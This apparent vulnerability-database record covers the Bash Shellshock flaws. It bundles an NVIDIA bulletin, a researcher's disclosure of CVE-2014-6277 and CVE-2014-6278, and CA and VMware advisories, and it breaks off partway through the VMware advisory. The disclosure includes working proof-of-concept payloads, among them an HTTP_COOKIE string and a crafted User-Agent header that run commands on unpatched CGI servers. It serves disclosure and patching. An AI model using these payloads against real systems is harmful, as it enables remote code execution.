ID NVIDIA:4386 Type nvidia Reporter Nvidia Modified 2017-05-15T12:37:00
Description
Vulnerability Details
CVE-2014-6271
GNU Bash processes trailing strings after function definitions in the values of environment variables. This processing allows remote attackers to execute arbitrary code through a crafted environment.
GNU Bash through version 4.3 bash43-026 does not properly parse function definitions in the values of environment variables. This failure to properly parse function definitions allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) through a crafted environment.
GNU Bash through version 4.3 bash43-026 does not properly parse function definitions in the values of environment variables. This failure to properly parse function definitions allows remote attackers to execute arbitrary commands through a crafted environment.
GNU Bash processes trailing strings after certain malformed function definitions in the values of environment variables. This processing allows remote attackers to write to files and may have some other unknown impact through a crafted environment.
The redirection implementation in parse.y in GNU Bash through version 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly some other unspecified impact through crafted use-of-here documents. This issue is also known as the redir_stack issue.
An off-by-one error in the read_token_word function in parse.y in GNU Bash through version 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly some other unspecified impact through deeply nested for loops. This issue is also known as the word_lineno issue.
NVIDIA’s risk assessment is based on an average of risk across a diverse set of installed systems and may not represent the true risk of your local installation. NVIDIA recommends consulting a local security or IT professional to evaluate the risk of your specific configuration.
{"id": "NVIDIA:4386", "type": "nvidia", "bulletinFamily": "software", "title": "Security Bulletin: Vulnerabilities in Bash affect NVIDIA Tegra Linux L4T CVE 2014-6271, CVE 2014-7169, CVE 2014-7186, CVE 2014-7187, CVE 2014-6277, CVE 2014-6278", "description": "### Vulnerability Details\n\n#### CVE-2014-6271\n\nGNU Bash processes trailing strings after function definitions in the values of environment variables. This processing allows remote attackers to execute arbitrary code through a crafted environment.\n\nCVSS Base Score: 10 \nCVSS Temporal Score: 8.3 \nCVSS 2 Vector: [(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C)](<https://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=\\(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C\\)>)\n\n#### CVE-2014-6277\n\nGNU Bash through version 4.3 bash43-026 does not properly parse function definitions in the values of environment variables. This failure to properly parse function definitions allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) through a crafted environment.\n\nCVSS Base Score: 10 \nCVSS Temporal Score: 8.3 \nCVSS 2 Vector: [(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C)](<https://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=\\(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C\\)>)\n\n#### CVE-2014-6278\n\nGNU Bash through version 4.3 bash43-026 does not properly parse function definitions in the values of environment variables. This failure to properly parse function definitions allows remote attackers to execute arbitrary commands through a crafted environment.\n\nCVSS Base Score: 10 \nCVSS Temporal Score: 8.3 \nCVSS 2 Vector: [(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C)](<https://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=\\(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C\\)>)\n\n#### CVE-2014-7169\n\nGNU Bash processes trailing strings after certain malformed function definitions in the values of environment variables. This processing allows remote attackers to write to files and may have some other unknown impact through a crafted environment.\n\nCVSS Base Score: 10 \nCVSS Temporal Score: 8.3 \nCVSS 2 Vector: [(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C)](<https://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=\\(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C\\)>)\n\n#### CVE-2014-7186\n\nThe redirection implementation in `parse.y` in GNU Bash through version 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly some other unspecified impact through crafted use-of-here documents. This issue is also known as the `redir_stack` issue.\n\nCVSS Base Score: 10 \nCVSS Temporal Score: 8.3 \nCVSS 2 Vector: [(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C)](<https://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=\\(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C\\)>)\n\n#### CVE-2014-7187\n\nAn off-by-one error in the `read_token_word` function in `parse.y` in GNU Bash through version 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly some other unspecified impact through deeply nested for loops. This issue is also known as the `word_lineno` issue.\n\nCVSS Base Score: 10 \nCVSS Temporal Score: 8.3 \nCVSS 2 Vector: [(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C)](<https://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=\\(AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C\\)>)\n\n_NVIDIA\u2019s risk assessment is based on an average of risk across a diverse set of installed systems and may not represent the true risk of your local installation. NVIDIA recommends consulting a local security or IT professional to evaluate the risk of your specific configuration._\n", "published": "2015-03-03T00:00:00", "modified": "2017-05-15T12:37:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://nvidia.custhelp.com/app/answers/detail/a_id/4386", "reporter": "Nvidia", "references": [], "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "lastseen": "2021-02-25T08:32:01", "viewCount": 22, "enchantments": {"dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31131", "SECURITYVULNS:DOC:31147", "SECURITYVULNS:DOC:31129", "SECURITYVULNS:VULN:13977"]}, {"type": "nessus", "idList": ["BASH_REMOTE_CODE_EXECUTION2.NASL", "MCAFEE_EMAIL_GATEWAY_SB10085.NASL", "IBM_STORWIZE_1_5_0_4.NASL", "VMWARE_VMSA-2014-0010_REMOTE.NASL", "SOLARIS11_BASH_20141031.NASL", "CISCO_TELEPRESENCE_CONDUCTOR_CSCUR02103.NASL", "VCENTER_OPERATIONS_MANAGER_VMSA_2014-0010.NASL", "VMWARE_NSX_VMSA_2014_0010.NASL", "F5_BIGIP_SOL15629.NASL", "CISCO-SA-CSCUR01959-ASA-CX.NASL"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:C46B0B3FC4C7E34D197F6DC7E602B255", "CFOUNDRY:13948A26B0F4A736B03310A8560A6F73"]}, {"type": "paloalto", "idList": ["PAN-SA-2014-0004"]}, {"type": "citrix", "idList": ["CTX200217"]}, {"type": "jvn", "idList": ["JVN:55667175"]}, {"type": "f5", "idList": ["F5:K15629", "SOL15629"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310850615", "OPENVAS:1361412562310105156", "OPENVAS:1361412562310802085", "OPENVAS:1361412562310850676", "OPENVAS:1361412562310105146", "OPENVAS:1361412562310850778", "OPENVAS:1361412562310850890", "OPENVAS:1361412562310850616", "OPENVAS:1361412562310121274"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20141024-01-BASH"]}, {"type": "seebug", "idList": ["SSV:87313", "SSV:88877"]}, {"type": "threatpost", "idList": ["THREATPOST:DBB88263397DE4DA6604A2D6517DC194", "THREATPOST:F6AE4A5AF20D9E9C8BE6663E8FC80848"]}, {"type": "cisco", "idList": ["CISCO-SA-20140926-BASH"]}, {"type": "vmware", "idList": ["VMSA-2014-0010"]}, {"type": "kitploit", "idList": ["KITPLOIT:2779031464033627796"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:09BAFC0653DB54EBD16EF2C94A327987", "EXPLOITPACK:9199830C2B5794BCE4073DDC29B86CF4"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:128650", "PACKETSTORM:128520", "PACKETSTORM:128535"]}, {"type": "lenovo", "idList": ["LENOVO:PS500044-NOSID"]}, {"type": "cert", "idList": ["VU:252743"]}, {"type": "zdt", "idList": ["1337DAY-ID-22754"]}, {"type": "cve", "idList": ["CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6277", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-6271"]}, {"type": "gentoo", "idList": ["GLSA-201410-01"]}, {"type": "symantec", "idList": ["SMNTC-70103"]}, {"type": "suse", "idList": ["SUSE-SU-2014:1247-1", "SUSE-SU-2014:1247-2", "OPENSUSE-SU-2014:1254-1", "SUSE-SU-2014:1259-1", "OPENSUSE-SU-2014:1242-1", "OPENSUSE-SU-2014:1229-1", "SUSE-SU-2014:1287-1"]}, {"type": "redhat", "idList": ["RHSA-2014:1312", "RHSA-2014:1865", "RHSA-2014:1306", "RHSA-2014:1311", "RHSA-2014:1354"]}, {"type": "amazon", "idList": ["ALAS-2014-419"]}, {"type": "centos", "idList": ["CESA-2014:1306"]}], "modified": "2021-02-25T08:32:01", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-02-25T08:32:01", "rev": 2}, "vulnersScore": 7.5}, "affectedSoftware": [{"version": "21.1", "operator": "le", "name": "l4t"}]}
{"securityvulns": [{"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "description": "\r\n\r\nGood morning! This is kinda long.\r\n\r\n== Background ==\r\n\r\nIf you are not familiar with the original bash function export\r\nvulnerability (CVE-2014-6271), you may want to have a look at this\r\narticle:\r\n\r\nhttp://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html\r\n\r\nWell, long story short: the initial maintainer-provided patch for this\r\nissue [1] (released on September 24) is *conclusively* broken.\r\n\r\nAfter nagging people to update for a while [5] [7], I wanted to share\r\nthe technical details of two previously non-public issues which may be\r\nused to circumvent the original patch: CVE-2014-6277 and\r\nCVE-2014-6278.\r\n\r\nNote that the issues discussed here are separate from the three\r\nprobably less severe problems publicly disclosed earlier on: Tavis'\r\nlimited-exploitability EOL bug (CVE-2014-7169) and two likely\r\nnon-exploitable one-off issues found by Florian Weimer and Todd Sabin\r\n(CVE-2014-7186 and CVE-2014-7187).\r\n\r\n== Required actions ==\r\n\r\nIf you have installed just the September 24 patch [1], or that and the\r\nfollow-up September 26 patch for CVE-2014-7169 [2], you are likely\r\nstill vulnerable to RCE and need to update ASAP, as discussed in [5].\r\n\r\nYou are safe if you have installed the unofficial function prefix\r\npatch from Florian Weimer [3], or its upstream variant released on\r\nSeptember 28 [4]. The patch does not eliminate the problems, but\r\nshields the underlying parser from untrusted inputs under normal\r\ncircumstances.\r\n\r\nNote: over the past few days, Florian's patch has been picked up by\r\nmajor Linux distros (Red Hat, Debian, SUSE, etc), so there is a\r\nreasonable probability that you are in good shape. To test, execute\r\nthis command from within a bash shell:\r\n\r\nfoo='() { echo not patched; }' bash -c foo\r\n\r\nIf you see "not patched", you probably want upgrade immediately. If\r\nyou see "bash: foo: command not found", you're OK.\r\n\r\n== Vulnerability details: CVE-2014-6277 (the more involved one) ==\r\n\r\nThe following function definition appearing in the value of any\r\nenvironmental variable passed to bash will lead to an attempt to\r\ndereference attacker-controlled pointers (provided that the targeted\r\ninstance of bash is protected only with the original patches [1][2]\r\nand does not include Florian's fix):\r\n\r\n() { x() { _; }; x() { _; } <<a; }\r\n\r\nA more complete example leading to a deref of 0x41414141 would be:\r\n\r\nHTTP_COOKIE="() { x() { _; }; x() { _; } <<`perl -e '{print\r\n"A"x1000}'`; }" bash -c :\r\n\r\nbash[25662]: segfault at 41414141 ip 00190d96 sp bfbe6354 error 4 in\r\nlibc-2.12.so[110000+191000]\r\n\r\n(If you are seeing 0xdfdfdfdf, see note later on).\r\n\r\nThe issue is caused by an uninitialized here_doc_eof field in a REDIR\r\nstruct originally created in make_redirection(). The initial segv will\r\nhappen due to an attempt to read and then copy a string to a new\r\nbuffer through a macro that expands to:\r\n\r\nstrcpy (xmalloc (1 + strlen (redirect->here_doc_eof)), (redirect->here_doc_eof))\r\n\r\nThis appears to be exploitable in at least one way: if here_doc_eof is\r\nchosen by the attacker to point in the vicinity of the current stack\r\npointer, the apparent contents of the string - and therefore its\r\nlength - may change between stack-based calls to xmalloc() and\r\nstrcpy() as a natural consequence of an attempt to pass parameters and\r\ncreate local variables. Such a mid-macro switch will result in an\r\nout-of-bounds write to the newly-allocated memory.\r\n\r\nA simple conceptual illustration of this attack vector would be:\r\n\r\n-- snip! --\r\nchar* result;\r\nint len_alloced;\r\n\r\nmain(int argc, char** argv) {\r\n\r\n /* The offset will be system- and compiler-specific */;\r\n char* ptr = &ptr - 9;\r\n\r\n result = strcpy (malloc(100 + (len_alloced = strlen(ptr))), ptr);\r\n\r\n printf("requested memory = %d\n"\r\n "copied text = %d\n", len_alloced + 1, strlen(result) + 1);\r\n\r\n}\r\n-- snip! --\r\n\r\nWhen compiled with the -O2 flag used for bash, on one test system,\r\nthis produces:\r\n\r\nrequested memory = 2\r\ncopied text = 28\r\n\r\nThis can lead to heap corruption, with multiple writes possible per\r\npayload by simply increasing the number of malformed here-docs. The\r\nconsequences should be fairly clear.\r\n\r\n[ There is also a latter call to free() on here_doc_eof in\r\ndispose_cmd.c, but because of the simultaneous discovery of the much\r\nsimpler bug '78 discussed in the next section, I have not spent a\r\nwhole lot of time trying to figure out how to get to that path. ]\r\n\r\nPerhaps notably, the ability to specify attacker-controlled addresses\r\nhinges on the state of --enable-bash-malloc and --enable-mem-scramble\r\ncompile-time flags; if both are enabled, the memory returned by\r\nxmalloc() will be initialized to 0xdf, making the prospect of\r\nexploitation more speculative (essentially depending on whether the\r\nstack or any other memory region can be grown to overlap with\r\n0xdfdfdfdf). That said, many Linux distributions disable one or both\r\nflags and are vulnerable out-of-the-box. It is also of note that\r\nrelatively few distributions compile bash as PIE, so there is little\r\nconsolation to be found in ASLR.\r\n\r\nSimilarly to the original vulnerability, this issue can be usually\r\ntriggered remotely through web servers such as Apache (provided that\r\nthey invoke CGI scripts or PHP / Python / Perl / C / Java servlets\r\nthat rely on system() or popen()-type libcalls); through DHCP clients;\r\nand through some MUAs and MTAs. For a more detailed discussion of the\r\nexposed attack surface, refer to [6].\r\n\r\n== Vulnerability details: CVE-2014-6278 (the "back to the '90s" one) ==\r\n\r\nThe following function definition appearing in the value of any\r\nenvironmental variable passed to bash 4.2 or 4.3 will lead to\r\nstraightforward put-your-command-here RCE (again, provided that the\r\ntargeted instance is not protected with Florian's patch):\r\n\r\n() { _; } >_[$($())] { echo hi mom; id; }\r\n\r\nA complete example looks like this:\r\n\r\nHTTP_COOKIE='() { _; } >_[$($())] { echo hi mom; id; }' bash -c :\r\n\r\n...or:\r\n\r\nGET /some/script.cgi HTTP/1.0\r\nUser-Agent: () { _; } >_[$($())] { id >/tmp/hi_mom; }\r\n\r\nNote that the PoC does not work as-is in more ancient versions of\r\nbash, such as 2.x or 3.x; it might have been introduced with\r\nxparse_dolparen() starting with bash 4.2 patch level 12 few years\r\nback, but I have not investigated this in a lot of detail. Florian's\r\npatch is strongly recommended either way.\r\n\r\nThe attack surface through which this flaw may be triggered is roughly\r\nsimilar to that for CVE-2014-6277 and the original bash bug [6].\r\n\r\n== Additional info ==\r\n\r\nBoth of these issues were identified in an automated fashion with\r\namerican fuzzy lop:\r\n\r\nhttps://code.google.com/p/american-fuzzy-lop\r\n\r\nThe out-of-the-box fuzzer was seeded with a minimal valid function\r\ndefinition ("() { foo() { foo; }; >bar; }") and allowed to run for a\r\ncouple of hours on a single core.\r\n\r\nIn addition to the issues discussed above, the fuzzer also hit three\r\nof the four previously-reported CVEs.\r\n\r\nI initially shared the findings privately with vendors, but because of\r\nthe intense scrutiny that this codebase is under, the ease of\r\nreproducing these results with an open-source fuzzer, and the\r\nnow-broad availability of upstream mitigations, there seems to be\r\nrelatively little value in continued secrecy.\r\n\r\n== References ==\r\n\r\n[1] http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-025\r\n[2] http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-026\r\n[3] http://www.openwall.com/lists/oss-security/2014/09/25/13\r\n[4] http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-027\r\n[5] http://lcamtuf.blogspot.com/2014/09/bash-bug-apply-unofficial-patch-now.html\r\n[6] http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html\r\n[7] http://www.pcworld.com/article/2688932/improved-patch-tackles-new-shellshock-attack-vectors.html\r\n\r\nPS. There are no other bugs in bash.\r\n\r\n", "edition": 1, "modified": "2014-10-05T00:00:00", "published": "2014-10-05T00:00:00", "id": "SECURITYVULNS:DOC:31129", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31129", "title": "the other bash RCEs (CVE-2014-6277 and CVE-2014-6278)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "description": "\r\n\r\n\r\nCA20141001-01: Security Notice for Bash Shellshock Vulnerability\r\n\r\n\r\nIssued: October 01, 2014\r\nUpdated: October 03, 2014\r\n\r\n\r\nCA Technologies is investigating multiple GNU Bash vulnerabilities, \r\nreferred to as the "Shellshock" vulnerabilities, which were publicly \r\ndisclosed on September 24-27, 2014. CVE identifiers CVE-2014-6271, \r\nCVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, and \r\nCVE-2014-6278 have been assigned to these vulnerabilities. These \r\nvulnerabilities could allow a local or remote attacker to utilize \r\nspecially crafted input to execute arbitrary commands or code.\r\n\r\nThe CA Technologies Enterprise Information Security team has led a \r\nglobal effort to identify and remediate systems and products discovered \r\nwith these vulnerabilities. We continue to patch our systems as fixes \r\nbecome available, and we are providing fixes for affected CA \r\nTechnologies products.\r\n\r\nCA Technologies continues to aggressively scan our environments \r\n(including servers, networks, external facing applications, and SaaS \r\nenvironments) to proactively monitor, identify, and remediate any \r\nvulnerability when necessary.\r\n\r\n\r\nRisk Rating\r\n\r\nHigh\r\n\r\n\r\nPlatform\r\n\r\nAIX\r\nAndroid (not vulnerable, unless rooted)\r\nApple iOS (not vulnerable unless jailbroken)\r\nLinux\r\nMac OS X\r\nSolaris\r\nWindows (not vulnerable unless Cygwin or similar ported Linux tools \r\n with Bash shell are installed)\r\nOther UNIX/BSD based systems if Bash is installed\r\nAny other OS or JeOS that utilizes Bash\r\n\r\n\r\nAffected Products\r\n\r\nThe following products have been identified as potentially vulnerable, \r\nand we have made fixes available for all of these products.\r\n\r\nCA API Management (Linux appliance only)\r\n\r\nCA Application Performance Management (TIM is the only affected APM \r\n component)\r\n\r\nCA Application Performance Management Cloud Monitor\r\n\r\nCA Customer Experience Manager (CEM) Transaction Impact Monitor (TIM)\r\n\r\nCA Layer 7 products (API Gateway, Mobile Access Gateway, API Management \r\n Portal)\r\n\r\nCA User Activity Reporting Module (Enterprise Log Manager)\r\n\r\nNote: This security notice will be updated if other CA Technologies \r\nproducts are determined to be vulnerable.\r\n\r\nIn most cases, the Bash vulnerabilities will need to be patched by OS \r\nvendors. Exceptions may include CA Technologies appliances, and \r\nsoftware products that include Linux, UNIX or Mac OS X based operating \r\nsystems (that include Bash).\r\n\r\n\r\nAffected Components\r\n\r\nCentOS\r\nCygwin\r\nGNU Bash\r\nRed Hat Enterprise Linux\r\nSUSE Linux\r\n\r\n\r\nNon-Affected Products\r\n\r\nIMPORTANT NOTE: This listing includes only a small subset of the \r\nunaffected CA Technologies products. We're including unaffected \r\nproducts that customers have already inquired about. While the \r\nfollowing CA Technologies products are not directly affected by the \r\nBash vulnerabilities, the underlying operating systems that CA \r\nTechnologies software is installed on may be vulnerable. We strongly \r\nencourage our customers to follow the recommendations provided by their \r\nvendors for all operating systems they utilize.\r\n\r\nAll CA SaaS / On Demand products were either not vulnerable or have \r\nalready been patched.\r\n\r\nCA AHS / PaymentMinder - AHS App is not vulnerable. The AHS app does \r\nnot execute CGI scripts, or spawn or execute shell commands from within \r\nthe app. AHS infrastructure already patched.\r\n\r\nCA Asset Portfolio Management\r\n\r\nCA AuthMinder (Arcot WebFort)\r\n\r\nCA AuthMinder for Business Users\r\n\r\nCA AuthMinder for Consumers\r\n\r\nCA AutoSys products - We use the bash shell that comes with the \r\noperating system and the customer is responsible for patching their OS. \r\nAdditionally, the agents themselves do not distribute any scripts that \r\nuse bash.\r\n\r\nCA Clarity On Demand\r\n\r\nCA CloudMinder - CloudMinder does not include the Bash Shell in BoM, or \r\nuse it, but because we are deployed on RHEL, customers may be \r\nindirectly affected. Customers using RHEL should apply patches provided \r\nby Red Hat.\r\n\r\nCA Console Management for OpenVMS - Our OpenVMS products do not bundle \r\nbash, and they do not supply bash scripts; we use nothing but the \r\nnative DCL CLI.\r\n\r\nCA ControlMinder\r\n\r\nCA DataMinder (formerly DLP) products \u2013 Software and appliance \r\nconfirmed not vulnerable. Note: Linux Agents shipped, but no public SSH \r\nor Web apps are used in these agents. Customers should patch bash shell \r\non any Linux server with DataMinder agents. DataMinder agents should \r\ncontinue to function normally.\r\n\r\nCA Digital Payments SaaS (previously patched)\r\n\r\nCA Directory\r\n\r\nCA eCommerce SaaS / On Demand (previously patched)\r\n\r\nCA Endevor Software Change Manager\r\n\r\nCA Federation (formerly SiteMinder Federation)\r\n\r\nCA GovernanceMinder\r\n\r\nCA IdentityMinder\r\n\r\nCA Infrastructure Management\r\n\r\nCA JCLCheck\r\n\r\nCA Job Management for OpenVMS - Our OpenVMS products do not bundle \r\nbash, and they do not supply bash scripts; we use nothing but the \r\nnative DCL CLI.\r\n\r\nCA NetQoS GigaStor Observer Expert\r\n\r\nCA Network Flow Analysis\r\n\r\nCA Performance Management for OpenVMS - Our OpenVMS products do not \r\nbundle bash, and they do not supply bash scripts; we use nothing but \r\nthe native DCL CLI.\r\n\r\nCA RiskMinder\r\n\r\nCA Service Desk Manager\r\n\r\nCA Service Operations Insight (SOI)\r\n\r\nCA SiteMinder\r\n\r\nCA SOLVE:Access\r\n\r\nCA Spectrum for Linux - Not vulnerable. Be sure to apply bash fixes \r\nfrom your underlying operating system vendor.\r\n\r\nCA Strong Authentication\r\n\r\nCA System Watchdog for OpenVMS - Our OpenVMS products do not bundle \r\nbash, and they do not supply bash scripts; we use nothing but the \r\nnative DCL CLI.\r\n\r\nCA Top Secret\r\n\r\nCA Universal Job Management Agent for OpenVMS - Our OpenVMS products do \r\nnot bundle bash, and they do not supply bash scripts; we use nothing \r\nbut the native DCL CLI.\r\n\r\nCA Virtual Assurance for Infrastructure Managers (VAIM)\r\n\r\n\r\nSolution\r\n\r\nCA Technologies has issued the following fixes to address the \r\nvulnerabilities.\r\n\r\nCA API Management:\r\nPatches for Linux appliance are available through CA Support to \r\ncustomers of Gateway (applicable for all versions \u2013 6.1.5, 6.2, 7.0, \r\n7.1, 8.0, 8.1, 8.1.1, 8.1.02).\r\n\r\nCA Application Performance Management:\r\nKB article for APM TIM has been published. APM TIM is the only part of \r\nAPM that was affected. Refer to TEC618037.\r\n\r\nCA Application Performance Management Cloud Monitor:\r\nNew images are available for subscribers. Download the latest OPMS \r\nversion 8.2.1.5. For assistance, contact CA Support.\r\n\r\nCA Customer Experience Manager (CEM) Transaction Impact Monitor (TIM):\r\nVery low risk. 9.6 is not affected. 9.5 Installation uses Bash. We do \r\nnot use Bash at all for the CEM operating system that we have shipped \r\nin the past. This means that customers who patch the OS will not impact \r\nthe ability of the CEM TIMsoft from operating. However prior to version \r\n9.6, the TIM installation script does use the bash shell. See new KB \r\narticle TEC618037 for additional information.\r\n\r\nCA Layer 7 (API Gateway, Mobile Access Gateway, API Management Portal):\r\nFixes for all Bash vulnerabilities and a security bulletin are available \r\non the Layer 7 Support website.\r\n\r\nCA User Activity Reporting Module (Enterprise Log Manager):\r\nAll 12.5 and 12.6 GA versions are potentially affected. Patches \r\nprovided on 2014-09-30. To get the patch, use the OS update \r\nfunctionality to get the latest R12.6 SP1 subscription update. Note \r\nthat you can update R12.5 SPx with the R12.6 SP1 OS update. For \r\nassistance, contact CA Support.\r\n\r\n\r\nWorkaround\r\n\r\nNone\r\n\r\nTo help mitigate the risk, we do strongly encourage all customers to \r\nfollow patch management best practices, and in particular for operating \r\nsystems affected by the Bash Shellshock vulnerabilities.\r\n\r\n\r\nReferences\r\n\r\nCVE-2014-6271 - Bash environment variable command injection\r\nCVE-2014-7169 - Bash environment variable incomplete fix for CVE-2014-6271\r\nCVE-2014-7186 - Bash parser redir_stack memory corruption\r\nCVE-2014-7187 - Bash nested flow control constructs off-by-one\r\nCVE-2014-6277 - Bash untrusted pointer use uninitialized memory\r\nCVE-2014-6278 - Bash environment variable command injection\r\n\r\nCA20141001-01: Security Notice for Bash Shellshock Vulnerability\r\nhttps://support.ca.com/irj/portal/anonymous/phpsbpldgpg\r\n\r\n\r\nChange History\r\n\r\nv1.0: 2014-10-01, Initial Release\r\nv1.1: 2014-10-02, Added AuthMinder, Strong Authentication, VAIM, \r\n Clarity OD, All SaaS/OD products to list of Non-Affected Products.\r\nv1.2: 2014-10-03, Added RiskMinder to Non-Affected Products. Updated \r\n UARM solution info.\r\n\r\n\r\nIf additional information is required, please contact CA Technologies \r\nSupport at https://support.ca.com.\r\n\r\nIf you discover a vulnerability in CA Technologies products, please \r\nreport your findings to the CA Technologies Product Vulnerability \r\nResponse Team at vuln@ca.com.\r\nPGP key:\r\nsupport.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782\r\n\r\nSecurity Notices\r\nhttps://support.ca.com/irj/portal/anonymous/phpsbpldgpg\r\n\r\n\r\nRegards,\r\nKen Williams\r\nDirector, Product Vulnerability Response Team\r\nCA Technologies | One CA Plaza | Islandia, NY 11749 | www.ca.com\r\nKen.Williams@ca.com | vuln@ca.com\r\n\r\n\r\nCopyright \u00a9 2014 CA. All Rights Reserved. One CA Plaza, Islandia, N.Y. \r\n11749. All other trademarks, trade names, service marks, and logos \r\nreferenced herein belong to their respective companies.\r\n\r\n\r\n", "edition": 1, "modified": "2014-10-13T00:00:00", "published": "2014-10-13T00:00:00", "id": "SECURITYVULNS:DOC:31147", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31147", "title": "CA20141001-01: Security Notice for Bash Shellshock Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:57", "bulletinFamily": "software", "cvelist": ["CVE-2014-3659", "CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "description": "It's possible to place a function into content of any environment variable.", "edition": 1, "modified": "2014-10-13T00:00:00", "published": "2014-10-13T00:00:00", "id": "SECURITYVULNS:VULN:13977", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13977", "title": "bash code execution", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nVMware Security Advisory\r\n\r\nAdvisory ID: VMSA-2014-0010\r\nSynopsis: VMware product updates address critical Bash \r\n security vulnerabilities\r\nIssue date: 2014-09-30\r\nUpdated on: 2014-09-30 (Initial Advisory)\r\nCVE numbers: CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, \r\n CVE-2014-7187\r\n- ------------------------------------------------------------------------\r\n\r\n1. Summary\r\n\r\n VMware product updates address Bash security vulnerabilities.\r\n\r\n2. Relevant Releases (Affected products for which remediation is present)\r\n\r\n vCenter Log Insight 2.0\r\n\r\n3. Problem Description \r\n\r\n a. Bash update for multiple products.\r\n\r\n Bash libraries have been updated in multiple products to resolve \r\n multiple critical security issues, also referred to as Shellshock.\r\n \r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the identifiers CVE-2014-6271, CVE-2014-7169, \r\n CVE-2014-7186, and CVE-2014-7187 to these issues.\r\n\r\n VMware products have been grouped into the following four\r\n product categories:\r\n \r\n I) ESXi and ESX Hypervisor\r\n ESXi is not affected because ESXi uses the Ash shell (through\r\n busybox), which is not affected by the vulnerability reported\r\n for the Bash shell.\r\n ESX has an affected version of the Bash shell. See table 1 for\r\n remediation for ESX.\r\n \r\n II) Windows-based products\r\n Windows-based products, including all versions of vCenter Server \r\n running on Windows, are not affected.\r\n\r\n III) VMware (virtual) appliances\r\n VMware (virtual) appliances ship with an affected version of Bash. \r\n See table 2 for remediation for appliances.\r\n \r\n IV) Products that run on Linux, Android, OSX or iOS (excluding\r\nvirtual\r\n appliances)\r\n\r\n Products that run on Linux, Android, OSX or iOS (excluding \r\n virtual appliances) might use the Bash shell that is part of the\r\n operating system. If the operating system has a vulnerable\r\n version of Bash, the Bash security vulnerability might be\r\n exploited through the product. VMware recommends that customers\r\n contact their operating system vendor for a patch. \r\n \r\n MITIGATIONS\r\n\r\n VMware encourages restricting access to appliances through\r\n firewall rules and other network layer controls to only trusted IP\r\n addresses. This measure will greatly reduce any risk to these\r\n appliances.\r\n\r\n RECOMMENDATIONS\r\n\r\n VMware recommends customers evaluate and deploy patches for\r\n affected products in Table 1 